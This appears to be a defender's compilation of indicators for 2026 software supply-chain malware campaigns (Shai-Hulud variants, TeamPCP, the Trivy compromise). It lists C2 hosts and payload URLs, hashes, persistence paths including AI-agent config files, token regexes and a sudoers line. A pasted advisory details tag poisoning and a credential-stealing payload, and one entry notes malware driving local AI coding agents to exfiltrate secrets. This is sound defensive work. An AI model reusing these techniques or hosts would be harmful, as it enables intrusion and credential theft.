4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34
mini
shai hulud sap
eb6eb4154b03ec73218727dc643d26f4e14dfda2438112926bb5daf37ae8bcdb
1d9e4ece8e13c8eaf94cb858470d1bd8f81bb58f62583552303774fa1579edee
6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95
a1da198bb4e883d077a0e13351bf2c3acdea10497152292e873d79d4f7420211
258257560fe2f1c2cc3924eae40718c829085b52ae3436b4e46d2565f6996271
80a3d2877813968ef847ae73b5eeeb70b9435254e74d7f07d8cf4057f0a710ac
86282ebcd3bebf50f087f2c6b00c62caa667cdcb53558033d85acd39e3d88b41
29ac906c8bd801dfe1cb39596197df49f80fff2270b3e7fbab52278c24e4f1a7
mini
shai hulud intercom
50212a875643520353df158196b9b3be4595094125ad8d2d2c48bdd9cb04ce1f
832a976d1a8d54e296e8479aedbd89fa24baa02b8409a78bf06d4d03340881bd
b084743bd16043461e68b604dde80a8b386b405eae6f66c1103fb4fd6831d4a7
66664a49edbcee0ed0d8365839707916e92d3aa06e7f26f33c9dcc58e5fc1ef3
907aec5b1288057a3e0885226918b6930a62a0f348ce23de026a683238c7903e
mini
shai hulud lightning
5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1
8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2
mini
shai hulud persistence
14eb4ce01dd4307759887ff819359b70d7d9ff709ecde039a5abc1aac325b128
927387d0cfac1118df4b383decc2ea6ba49c9d2f98b47098bcbcba1efc026e1f
GitHub
Artifacts- 8
pypi
packages
lightning==2.6.2
lightning==2.6.3
npm
packages
@cap-js/[email protected]
@cap-js/[email protected]
@cap-js/[email protected]
packagist
packages
Malware
Signatures- 33
attribution
strings
A Mini Shai-Hulud has Appeared
OhNoWhatsGoingOnWithGitHub
EveryBoiWeBuildIsAWormyBoi
beautifulcastle
claude
chore: update dependencies
dependabout
persistence
paths
.claude/router_runtime.js
.claude/setup.mjs
.claude/settings.json
.vscode/setup.mjs
.vscode/tasks.json
results/results-*.json
/tmp/tmp.987654321.lock
network
behavior
Russian locale exit
POST /v1/telemetry
GitHub GraphQL API commit search
dune
repo words
sardaukar
mentat
fremen
atreides
harkonnen
gesserit
prescient
fedaykin
tleilaxu
siridar
kanly
sayyadina
ghola
powindah
prana
kralizec
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Checkmarx-jenkins
Network
Indicators- 4
checkmarx
jenkins c2
checkmarx.cx
91.195.240.123
updates.checkmarx.cx
94.154.172.183
File Hashes- 9
checkmarx jenkins may9
01ff1e56fd59a8fa525d97e670f7f297a1a204331b89b2cd4e36a9abc6419203
f50a96d26a5b0beb29de4127e82b2bf350c21511e5a43d286e43f798dc6cd53f
3ddb8967919a801b3c383e58cddceab21138134c6a26560d99e2672e86f36f2a
85487e68fc46fe3faec2617ac4f2ee5d
1ac56ecda9a255c23eabd70c276905a0
9f9f83795fc162b7e44bc6859fc80535
HeyEveryoneCheckmarxIsNotGonnaMakeIt
/tmp/tmp.checkmarx_tracker.lock
~/hugs_from_teamPCP.txt
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Mini-shi-hulud-2
Network
Indicators- 12
mini
shai hulud 2 c2
git-tanstack.com
83.142.209.194
83.142.209.194/transformers.pyz
api.masscan.cloud
seed1.getsession.org
seed2.getsession.org
seed3.getsession.org
filev2.getsession.org
05f9e609d79eed391015e11380dee4b5c9ead0b6e2e7f0134e6e51767a87323026
durabletask c2
83.142.209.194
elementary data c2
litter.catbox.moe/h8nc9u.js
litter.catbox.moe/7rrc6l.mjs
File
Hashes- 8
mini
shai hulud 2 malware
ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c
2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96
2258284d65f63829bd67eaba01ef6f1ada2f593f9bbe41678b2df360bd90d3df
7c12d8614c624c70d6dd6fc2ee289332474abaa38f70ebe2cdef064923ca3a9b
6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b
mini
shai hulud 2 persistence
src/mistralai/client/__init__.py
/tmp/transformers.pyz
MISTRAL_INIT=1
GitHub
Artifacts- 25
tanstack
attack
zblgg/configuration
79ac49eedf774dd4b0cfa308722bc463cfe5885c
compromised
accounts
zblgg
voicproducoes
pypi
packages
guardrails-ai==0.10.1
mistralai==2.4.6
npm
packages
@tanstack/[email protected]
@tanstack/[email protected]
@tanstack/[email protected]
@tanstack/[email protected]
@tanstack/*
@tanstack/[email protected]
@uipath/*
@uipath/[email protected]
@uipath/[email protected]
@uipath/[email protected]
@mistralai/[email protected]
@mistralai/[email protected]
@mistralai/[email protected]
@mistralai/[email protected]
@mistralai/[email protected]
@mistralai/[email protected]
@mistralai/[email protected]
@mistralai/[email protected]
@mistralai/[email protected]
Malware
Signatures- 1
persistence
paths
~/.config/gh/hosts.yml
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Cemu
Network
Indicators- 1
mini
shai hulud 2 c2
83.142.209.194
File Hashes- 7
cemu releases
0f35abda19fb69430c32228465396094b866d887427bf551e353ab31256a9dd6
d07a29c4458d00e42d5d9e6345932592e91644d6b821bacdb7a543c628e0b41a
f140e76236b96adf7cdc796227af9808665143bc674debb77729fa3e4b8327cc
1bf72f05191d849049d4a38fced2277ac5cfc54b7ae591f564e7a14add7c886d
cemu persistence
/tmp/.transformers
83.142.209.194/v1/weights
python_mistral_cemu_files/
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Durabletask
Network
Indicators- 3
durabletask
c2
check.git-service.com
t.m-kosche.com
83.142.209.194
File
Hashes- 4
durabletask
packages
7d80b3ef74ad7992b93c31966962612e4e2ceb93e7727cdbd1d2a9af47d44ba8
aeaf583e20347bf850e2fabdcd6f4982996ba023f8c2cd56bbd299cfd56516f5
877ff2531a63393c4cb9c3c86908b62d9c4fc3db971bc231c48537faae6cb3ec
durabletask
malware
069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce
GitHub
Artifacts- 4
pypi
packages
guardrails-ai==0.10.1
durabletask==1.4.1
durabletask==1.4.2
durabletask==1.4.3
Malware
Signatures-
5
persistence
paths
/tmp/managed.pyz
/tmp/rope-*.pyz
~/.cache/.sys-update-check
~/.cache/.sys-update-check-k8s
/tmp/.rope_state/ssm_instances.json
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Antv
Network
Indicators- 7
durabletask
c2
t.m-kosche.com
antv
c2
t.m-kosche.com
185.95.159.32
t.m-kosche.com:443/api/public/otel/v1/traces
api.github.com/search/commits?q=firedalazer
fulcio.sigstore.dev/api/v2/signingCert
rekor.sigstore.dev/api/v1/log/entries
File
Hashes- 10
antv vscode
1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8
b0cefb66b953e5184b6adb3035e9e267335ac5eabfe1848e07834777b9397b74
e7347d90653efc565f03733a95e9209d78f9cfa81e31ff2b2dd9d48d75a4b8b1
43f2b001846c4966073ebffa5be8f15e491a1e7d32bbd805d57406ff540e0dd9
228a2cf081d4cbea9b91cde14a8f9c4a4d003e7f32431496953fd6bac266f5a3
cb86f4f223daa54467c7782a0d8607e9c84e2bb633e6f0e51d9a19579e200990
antv backdoor
fb5c97557230a27460fdab01fafcfabeaa49590bafd5b6ef30501aa9e0a51142
783b4019fc5b942a29846132d28441c8fc31bed8
b06b126b9e26af03a7ef2f8b8e90d446
antv npm payload
a68dd1e6a6e35ec3771e1f94fe796f55dfe65a2b94560516ff4ac189390dfa1c
GitHub
Artifacts- 39
compromised
accounts
atool
antv
imposter commits
antvis/G2 @ 1916faa365f2788b6e193514872d51a242876569
antvis/G2 @ 7cb42f57561c321ecb09b4552802ae0ac55b3a7a
antvis/G2 @ dc3d62a2181beb9f326952a2d212900c94f2e13d
antv
vscode commits
558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2
ba642fe2c7c65e42dd7f6444b83023dc6827e08c
acfc3f957a63b4cde93ff645f2b6bf26a8ed1bbf
9d88f040c44b5f4d5f9db15ff89310776c168e99
antv
actions
actions-cool/issues-helper
actions-cool/maintain-one-comment
1c9e803c80cc7fed000022d4c94f4b5bc2e90062
f0448c62fc57b8a5ce23d8acd6e795cdd76a3b6c
b9c83f01929e190cda300e76f688bf7ea7e37a7a
npm packages
@antv/*
@antv/[email protected]
@antv/[email protected]
@antv/g6
@antv/x6
@antv/l7
@antv/s2
@antv/f2
@antv/g
@antv/g2plot
@antv/graphin
@antv/data-set
@antv/[email protected]
@antv/[email protected]
canvas-nest.js
jest-canvas-mock
jest-date-mock
vscode extensions
Malware
Signatures- 56
attribution
strings
firedalazer
niagA oG eW ereH :duluH-iahS
python-requests/2.31.0
python-httpx/0.28.1
Run Copilot
Build action for vX.Y.Z
New Package
format-results
persistence
paths
~/.config/gh/hosts.yml
~/.local/share/kitty/cat.py
~/Library/LaunchAgents/com.user.kitty-monitor.plist
~/.config/systemd/user/kitty-monitor.service
/var/tmp/.gh_update_state
/tmp/kitty-*
~/.local/bin/gh-token-monitor.sh
.github/workflows/codeql.yml
network
behavior
bun run index.js
/proc//mem read
169.254.169.254
169.254.170.2
127.0.0.1:8200
gh[op]_[A-Za-z0-9]{36,}
npm_[A-Za-z0-9]{36,}
registry.npmjs.org/-/npm/v1/oidc/token/exchange/package/
runner ALL=(ALL) NOPASSWD:ALL
__DAEMONIZED=1
dune
repo words
sardaukar
mentat
fremen
atreides
harkonnen
gesserit
prescient
fedaykin
tleilaxu
siridar
kanly
sayyadina
ghola
powindah
prana
kralizec
sandworm
ornithopter
heighliner
stillsuit
lasgun
sietch
melange
thumper
navigator
futar
phibian
slig
cogitor
laza
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Elementary-data
Network
Indicators- 8
elementary
data c2
igotnofriendsonlineorirl-imgonnakmslmao.skyhanni.cloud
188.114.96.3
litter.catbox.moe/iqesmbhukgd2c7hq.sh
elementary
data markers
X-Rise-To-The-Trinny: agree
trin.tar.gz
$TMPDIR/.trinny-security-update
%TEMP%\.trinny-security-update
050afbe046d7545f5af1a0d3fcfbaf6e993fd93d487b431f09bc9e963c7220a135
File
Hashes-8
elementary
data packages
d37874c6c8a2d2a7a252810a1999ece8bb39e9b3ab2b7e8bf40da15bd36a1584
83f9b178b520d3ad8b49bc9ea2b454eacf64fc302ec42aff6f90a1245af299e9
96dc65f67f54411d3de6b23a33a8f73665e2703d7261b7f1720cdc089c528eea
fcb538f8a937dd2e97532899be80827772aa99f0523c582aef301682d6e96b75
cc802c0d8b918c99b39f26f473e8090b7073d45268b399df2e2ff5d5549c2a37
0bf22f5de2169f2f614c12aaecf586fd7a203cff41f4b79583963a30660a7019
elementary
data artifacts
b1e4b1f3aad0d489ab0e9208031c67402bbb8480
sha256:31ecc5939de6d24cf60c50d4ca26cf7a8c322db82a8ce4bd122ebd89cf634255
GitHub
Artifacts- 3
compromised
accounts
realtungtungtungsahur
container
images
ghcr.io/elementary-data/elementary:0.23.3
pypi
packages
elementary-data==0.23.3
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Miasma
Network
Indicators-
6
miasma
indicators
google-api-nodejs-client/7.0.0 gl-node/20.11.0 gccl/7.0.0
IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner
Miasma: The Spreading Blight
thebeautifulmarchoftime
tmp.0987654321.lock
__IS_DAEMON
File
Hashes- 6
miasma packages
88896d478986d453f5da79b311de39d9b4b1bea95c21af1d8ef181b0f4e52fe9
miasma malware
21b6409a7b84446310daca5409ad6112ac60a1e4bef97736e53fff5f63bfdef4
0dc06ecdaa63fe24859cfd955053c23245c536e4733480239d14bebf12688e35
miasma
persistence
.claude/settings.json
.vscode/tasks.json
.github/setup.js
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Pcpcat
Network
Indicators- 11
pcpcat
c2
67.217.57.240
44.252.85.168
pcpcat
payloads
67.217.57.240:666/files/proxy.sh
67.217.57.240:666/files/pcpcat.py
67.217.57.240:666/files/react.py
67.217.57.240:666/files/redis-deploy.py
67.217.57.240:666/files/BORING_SYSTEM
67.217.57.240:666/files/kube.py
pcpcat
markers
PCPcat-FRP-Token-2024
pcpcat-pool
PCPcat-Group-Key
Malware
Signatures- 11
persistence
paths
/etc/systemd/system/pcpcat-gost.service
/etc/systemd/system/pcpcat-frp.service
/etc/systemd/system/pcpcat-scanner.service
/etc/systemd/system/pcpcat-react.service
/etc/systemd/system/pcpcat-redis.service
/etc/systemd/system/pcpcat-boring.service
/etc/cron.d/teampcp
kubernetes
alpine:latest
system-monitor
teampcp
network
behavior
NEXT_REDIRECT error exfil
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Fri, Feb 27- 12:00 UTC
Malicious Trivy VSCode extension published to OpenVSX
Attacker releases malicious v1.8.12
of the Trivy VSCode extension to OpenVSX using a former employee's token.
Payload leveraged local AI coding agents to exfiltrate secrets. Extension
removed March 1. CVE-2026-28353 (CVSS 10.0).
Disclosure- Trivy VSCode
Extension version 1.8.12, which was distributed via OpenVSX marketplace was
compromised and contained malicious code designed to leverage local AI coding agent to collect
and exfiltrate sensitive information.
Users using the affected artifact are advised to immediately remove it and
rotate environment secrets. The malicious artifact has been removed from the
marketplace. No other affected artifacts have been identified.
Critical
CVE ID
CVE-2026-28353
Weaknesses
CWE-506- Embedded Malicious Code
The product contains code that appears to be malicious in
nature. Learn
more on MITRE.
Phase 01 Initial Compromise
( 4 events, 1
milestone)
Mar 19-22-
Trivy (Aqua) - 27 events
Compromised via incomplete
credential rotation after Feb PwnRequest. 75/76 tags hijacked; payload stole
CI/CD secrets.
CVE-2026-33634
(https://www.cve.org/CVERecord?id=CVE-2026-33634)
Trivy is a security scanner. On
March 19, 2026, a threat actor used compromised credentials to publish a
malicious Trivy v0.69.4 release, force-push 76 of 77 version tags in
`aquasecurity/trivy-action` to credential-stealing malware, and replace all 7
tags in `aquasecurity/setup-trivy` with malicious commits. This incident is a
continuation of the supply chain attack that began in late February 2026.
Following the initial disclosure on March 1, credential rotation was performed
but was not atomic (not all credentials were revoked simultaneously). The
attacker could have use a valid token to exfiltrate newly rotated secrets
during the rotation window (which lasted a few days). This could have allowed
the attacker to retain access and execute the March 19 attack. Affected
components include the `aquasecurity/trivy` Go / Container image version
0.69.4, the `aquasecurity/trivy-action` GitHub Action versions 0.0.1 – 0.34.2
(76/77), and the`aquasecurity/setup-trivy` GitHub Action versions 0.2.0 –
0.2.6, prior to the recreation of 0.2.6 with a safe commit. Known safe versions
include versions 0.69.2 and 0.69.3 of the Trivy binary, version 0.35.0 of
trivy-action, and version 0.2.6 of setup-trivy. Additionally, take other
mitigations to ensure the safety of secrets. If there is any possibility that a
compromised version ran in one's environment, all secrets accessible to
affected pipelines must be treated as exposed and rotated immediately. Check
whether one's organization pulled or executed Trivy v0.69.4 from any source.
Remove any affected artifacts immediately. Review all workflows using
`aquasecurity/trivy-action` or `aquasecurity/setup-trivy`. Those who referenced
a version tag rather than a full commit SHA should check workflow run logs from
March 19–20, 2026 for signs of compromise. Look for repositories named
`tpcp-docs` in one's GitHub organization. The presence of such a repository may
indicate that the fallback exfiltration mechanism was triggered and secrets
were successfully stolen. Pin GitHub Actions to full, immutable commit SHA
hashes, don't use mutable version tags.
Aqua
Statement- (PARTICIAL use link for full)
(https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/)
- Late
February 2026: Attackers exploited a misconfiguration in
Trivy’s GitHub Actions environment, extracting a privileged access token
and establishing a foothold in repository automation and release
processes. - March
1, 2026: The Trivy team disclosed the earlier incident and
executed credential rotation. Subsequent investigation revealed the
rotation was not fully comprehensive, allowing the threat actor to retain
residual access via still-valid credentials. - March
19, 2026 (~17:43 UTC): The attacker force-pushed 76 of 77
version tags in the aquasecurity/trivy-action repository and all 7 tags in
aquasecurity/setup-trivy, redirecting trusted references to malicious
commits. Simultaneously, the compromised aqua-bot service account triggered
release automation to publish a malicious Trivy binary designated v0.69.4. - March
19, 2026 (~20:38 UTC): The Trivy team identified and
contained the attack, removing malicious artifacts from distribution
channels. - March
20, 2026: Safe versions, user guidance, and indicators of
compromise were published for defenders.
*********The attacker also attempted to use the compromised
`aqua-bot` service account to push malicious workflows to the open source
`tfsec`, `traceeshark`, and `trivy-action` repositories. These workflows were
designed to steal additional Trivy credentials (not yet confirmed), including
GPG keys and credentials for Docker Hub, Twitter, and Slack (Aqua corporate
uses Teams). The stolen credentials were intended to be exfiltrated to a
Cloudflare Tunnel C2 endpoint (`plug-tab-protective-relay.trycloudflare.com`).
*******The attacker made imposter commits by spoofing
GitHub users rauchg (pushed to actions/checkout) and DmitriyLewen (pushed to
aquasecurity/trivy).
Rather than introducing a new,
clearly malicious version, the attackers used a more sophisticated approach. By
modifying existing version tags associated with trivy-action, they
injected malicious code into workflows that organizations were already
running. Because many CI/CD pipelines rely on version tags rather than
pinned commits, these pipelines continued to execute without any indication
that the underlying code had changed.
Just a reminder as we share more
details, the indecent appears to be isolated to the Trivy open source project
in GitHub. We have no indication that Aqua Security’s commercial offerings were
impacted by this activity.
Tag
Poisoning Technique
**For each of the 75 compromised trivy-action tags,
the attacker executed the following technique:
- Started
from the master HEAD tree (57a97c7e), containing the latest code. - Swapped
only entrypoint.sh with the infostealer payload, leaving all other files
intact. - Looked
up the original commit the tag previously pointed to. - Cloned
that original commit’s metadata — author name, email, committer, both
timestamps, and the full commit message including PR number and “Fixes”
references. - Set
the parent to 57a97c7e (master HEAD) instead of the original parent. - Force-pushed
the tag to this newly crafted commit.
The result was a file tree
identical across all 75 malicious commits (master plus the swapped
entrypoint.sh), with only the spoofed commit metadata varying per tag to appear
legitimate in git log.
Forensic
indicators of the forgery:
- Original
commits were GPG-signed by GitHub when merged via the web UI; the
attacker’s commits are unsigned. - Each
commit claims a date from the original release (2021, 2022, etc.) but has
a parent dated March 2026, an impossible lineage. - Each
malicious commit modifies only entrypoint.sh; the originals touched
multiple files. - GitHub’s
release page shows “0 commits to master since this release” for tags from
2020, even though there should be hundreds of commits.
Why
tag 0.35.0 was not poisoned:
It already pointed to
master HEAD (57a97c7e), the base tree the attacker used. Replacing it would
have produced a self-referencing commit and risked drawing attention to the
latest release.
GitHub
“Immutable” badge caveat:
GitHub’s release UI
displayed “Immutable” badges next to each poisoned tag. The attacker may have
deliberately published immutable releases after force-pushing, locking in the
malicious state. Organizations should not rely solely on the “Immutable” indicator.
Pinning to full commit SHAs remains the only truly immutable protection.
Threat
Actor Attribution
*,**The malware self-identifies as “TeamPCP Cloud stealer” in a Python
comment embedded in the filesystem credential harvester payload. TeamPCP
(also tracked as DeadCatx3, PCPcat, and ShellForce) is a documented
cloud-native threat actor known for exploiting misconfigured Docker APIs,
Kubernetes clusters, Ray dashboards, and Redis servers. The group has been
linked to worm-driven ransomware, data exfiltration, and cryptomining
campaigns, and was profiled by Flare and reported by The Hacker News in
February 2026. Wiz tracks the actor formally at threats.wiz.io/all-actors/teampcp.
The self-labeling could be a false flag,
but the technical overlap with prior TeamPCP tooling, including the
cloud-native theft-and-monetization profile, the emphasis on cryptocurrency
wallet targeting, and the use of ICP-hosted infrastructure, makes genuine
attribution plausible.
Technical
Analysis of the Malicious Payloads
In affected environments, the
payload was designed to collect sensitive information, including API tokens,
cloud credentials (AWS, GCP, Azure), SSH keys, Kubernetes tokens, Docker
configuration files, Git credentials, and other secrets available within CI/CD
systems. Critically, the malware executed prior to legitimate Trivy scanning
logic, so compromised workflows appeared to complete normally while silently
exfiltrating data to attacker-controlled infrastructure via two pathways (see
IOCs below).
Malicious
GitHub Action Payload (entrypoint.sh)
**The malicious entrypoint.sh injected into both
trivy-action and setup-trivy is 204 lines long. Lines 4–105 contain the
infostealer; lines 106–204 contain the legitimate Trivy scanning code. Because
the malware executes first and the real scan follows as usual, users see the
expected output and may not notice anything is wrong. The payload operates in
three distinct stages:
Stage
1 — Collection (lines 4–36):
- The
malware locates GitHub Actions runner processes (Runner.Worker, Runner.
Listener, runsvc, run.sh) and reads null-delimited environment variables
from /proc//environ, filtering for keys containing “env” or
“ssh”. - On
GitHub-hosted runners: A base64-encoded Python script is
decoded and executed with sudo (GitHub-hosted Linux runners provide
passwordless sudo). It locates the Runner. Worker process, parses
/proc//maps to identify all readable memory regions, and dumps
each region from /proc//mem. The shell wrapper then searches
for the JSON pattern {“value”:””, “isSecret”: true} — the
internal format GitHub Actions uses to store secrets in the Runner. Worker
.NET process heap. - On
self-hosted runners: A comprehensive filesystem credential
harvester (self-identified as “TeamPCP Cloud stealer”) targets 50+
sensitive file paths across SSH, Git, AWS, GCP, Azure, Kubernetes, Docker,
databases, CI/CD configs, TLS private keys, VPN configs, shell history, and
cryptocurrency wallets.
Category | Targets |
Reconnaissance | hostname, |
SSH | ~/.ssh/id_rsa, |
Git | ~/.git-credentials, |
AWS | ~/.aws/credentials, |
GCP | ~/.config/gcloud/*, |
Azure | ~/.azure/*, |
Kubernetes | ~/.kube/config, |
Docker | ~/.docker/config.json, |
Database | ~/.pgpass, |
Package | ~/.npmrc, |
CI/CD | terraform.tfvars, |
TLS | *.key, |
VPN | /etc/wireguard/*.conf, |
Crypto | Bitcoin, |
Shell | ~/.bash_history, |
Stage
2 — Encryption (lines 39–68):
- Generates
32 bytes of random session material. - Encrypts
collected data with AES-256-CBC using PBKDF2 key derivation. - Wraps
the session material with the attacker’s embedded RSA-4096 public key
using OAEP padding. - Bundles
encrypted payload and wrapped session key into tpcp.tar.gz.
Stage
3 — Exfiltration (lines 70–104):
- Primary
channel: HTTPS POST to scan.aquasecurtiy[.]org (typosquat) with
X-Filename: tpcp.tar.gz header. - Fallback
channel: If primary fails and INPUT_GITHUB_PAT is available,
creates a public repository named tpcp-docs on the victim’s own GitHub
account, creates a timestamped release, and uploads the encrypted bundle
as a release asset. Note: requires a user-scoped PAT; the default
GITHUB_TOKEN would fail. - Cleanup: All
temporary files are removed.
Malicious
Trivy Binary (v0.69.4)
*When the malicious binary is executed, it starts
both the legitimate Trivy service and the malicious code in parallel.
Data
Theft:
The malicious process gathers
environment variables, scans the filesystem for stored credentials, and
enumerates network interfaces. It then compresses and encrypts the data and
attempts to exfiltrate it via a POST request to scan.aquasecurtiy[.]org. If that
fails, the malware attempts to use a stolen GITHUB_TOKEN to create a tpcp-docs
repository and post the data there.
Persistence
Mechanism:
The malicious binary
checks whether it is running on a developer machine (not GitHub Actions) by
verifying that GITHUB_ACTIONS is not “true”. If that check passes, it writes a
Python dropper to ~/.config/systemd/user/sysmon.py and creates a systemd user unit
that runs the script persistently. sysmon.py initially sleeps for 5 minutes,
then polls the ICP-hosted C2 canister
(tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io). If a non-YouTube link is found, the
dropper downloads to /tmp/pglog and executes it in a new session.
At the time of initial analysis
(March 20), the ICP endpoint was set to a RickRoll URL. By March 22, the
ICP-hosted fallback C2 was actively serving an iteratively developed payload
designated kamikaze.sh. As of March 22, 21:31 UTC, the ICP canister was marked
“Unavailable Due to Policy Violation.”
Developer
Machine Remediation:
Any system on which the malicious
binary was executed outside of GitHub Actions should be checked for the
presence of ~/.config/systemd/user/sysmon.py and associated systemd unit files,
and these should be removed immediately.
What
Was Affected
The following open source components were affected:
- Trivy
binary release: v0.69.4 - GitHub
Action aquasecurity/trivy-action: 76 of 77 version tags
force-pushed to malicious commits (only v0.35.0 was unaffected, protected
by GitHub’s immutable releases feature) - GitHub
Action aquasecurity/setup-trivy: multiple version tags compromised
Any CI/CD workflow that referenced these actions via a
mutable version tag, or that downloaded:
- trivy
v0.69.4, between approximately 18:22 UTC and 21:42 UTC on
March 19, 2026, - trivy-action
v0.69.4, between approximately 17:43UTC UTC on March 19, 2026
and 05:40 UTC on March 20, 2026, - setup-trivy,
between approximately 17:43 UTC and 21:44 UTC on March 19, 2026,
These should be treated as
potentially compromised. All secrets accessible to those runner environments
must be considered exposed.
What
Was Not Affected
There is no indication that Aqua
Security’s commercial products were impacted by this incident, including Trivy
as delivered within the Aqua Platform.
This statement does not apply to
the independent use of open-source Trivy components outside the Aqua Platform.
Users who consume open-source Trivy directly should follow the remediation
guidance below.
Enterprise
Environment Isolation
The commercial platform is
architecturally isolated from the compromised open-source environment:
- Built
and operated entirely separate from GitHub - No
shared repositories, CI/CD infrastructure, secrets, or signing systems - Dedicated
pipelines and access controls, including SSO, IP allowlisting, and ZTNA - Controlled
integration process where the commercial fork lags open-source releases
and undergoes a gated security review
As a result, the malicious Trivy
v0.69.4 release was never incorporated into the commercial environment, and the
GitHub-based attack path does not apply to the commercial build system.
What
Actions We Are Taking
Our corporate security and
engineering teams are actively working in close coordination with the Trivy
maintainers and the broader security community to investigate the incident and
ensure full containment. Steps taken include:
- Artifact removal: All
malicious releases, including v0.69.4 binaries across GitHub Releases,
Docker Hub, GHCR, and ECR, have been deleted. [UPDATE — Source:
Wiz/Socket] This includes the subsequently published Docker Hub
images tagged 0.69.5 and 0.69.6. - Tag restoration: All
compromised version tags have been deleted or repointed to known-safe,
verified commits. - Credential revocation: A
comprehensive lockdown of all automated actions, service accounts, and
tokens across the Aqua Security open-source organization has been
implemented. - Access control hardening: Stricter
safeguards have been implemented around automation and token usage,
including tightened permissions and reduced reliance on long-lived
credentials. - Immutable release
enforcement: We are implementing immutable release
verification and provenance attestations for all future deployments. - Ongoing monitoring: We
continue to analyze the full scope of the incident and monitor for signs
of downstream impact.
GitHub Security Advisory: GHSA-cxm3-wv7p-598c
Ongoing updates: github.com/aquasecurity/trivy/discussions/10425
Required
Actions for the Community
For users of open source Trivy, immediate action is
required.
Step
1: Update to Known-Safe Versions
Component | Safe | Reference |
Trivy | v0.69.2–v0.69.3 | GitHub |
trivy-action | v0.35.0 | GitHub |
setup-trivy | v0.2.6 | GitHub |
Step
2: Rotate All Potentially Exposed Secrets
If there is any possibility that a
compromised version ran in your environment, all secrets accessible to affected
pipelines must be treated as exposed and rotated immediately:
- Credentials
for cloud providers (AWS, GCP, Azure) - Source
control and Git credentials - Container
registry credentials - SSH
keys and Kubernetes tokens - Environment
variables and other automation secrets - NPM
publish tokens: treat as actively compromised; stolen tokens
are being weaponized to propagate malware across the NPM ecosystem. - **Cryptocurrency
wallets and validator keys: Bitcoin, Litecoin, Dogecoin,
Zcash, Dash, Ripple, Monero configs; Ethereum keystores; Cardano
signing/verification keys; Solana keypairs (validator-keypair.json,
vote-account-keypair.json, identity.json); Ledger device files; Anchor
deploy keys. Rotate or transfer to new wallets immediately. - **Database
credentials: ~/.pgpass, ~/.my.cnf, ~/.mongorc.js, Redis
config files, and environment variables matching DATABASE, DB_, MYSQL,
POSTGRES, MONGO, REDIS, VAULT. - **TLS
private keys: *.key, *.pem, *.p12, *.pfx, including
/etc/ssl/private/ and /etc/letsencrypt/. - **VPN
configurations: WireGuard configuration files in
/etc/wireguard/.
Step
3: Audit Trivy Versions
Check whether your organization
pulled or executed Trivy v0.69.4 from any source. Remove any affected artifacts
immediately.
Also check for Docker images tagged 0.69.5 and 0.69.6,
published to Docker Hub on March 22.
Step
4: Audit GitHub Action References
Review all workflows using
aquasecurity/trivy-action or aquasecurity/setup-trivy. Check workflow run logs
from March 19–20, 2026, for signs of compromise.
Also review any workflows
referencing aquasecurity/kics-github-action, which was subject to a parallel
compromise identified on March 23.
Step
5: Search for Exfiltration Artifacts
Look for repositories named
tpcp-docs in your GitHub organization. The presence of such a repository may
indicate successful exfiltration via the fallback mechanism.
*On developer machines where
the malicious Trivy binary may have been executed, check for the persistence
dropper at ~/.config/systemd/user/sysmon.py and associated systemd user unit
files. Remove immediately if found.
Step
6: Long-Term Hardening — Pin to Full SHA Hashes
Pin GitHub Actions to full, immutable commit SHA
hashes — not mutable version tags. Version tags can be moved to
point at malicious commits.
Example:
UNSAFE: uses:
aquasecurity/[email protected]
SAFE:
uses: aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1
**Note: GitHub’s “Immutable” release badge does not
prevent tag force-pushing. Pinning to full commit SHA remains the only reliable
protection.
# UNSAFE — mutable tag, can be silently redirected to
malicious code
uses: aquasecurity/[email protected]
# SAFE — pinned to an immutable commit SHA
uses:
aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1
Indicators of Compromise (IOCs)
Network and Infrastructure IOCs
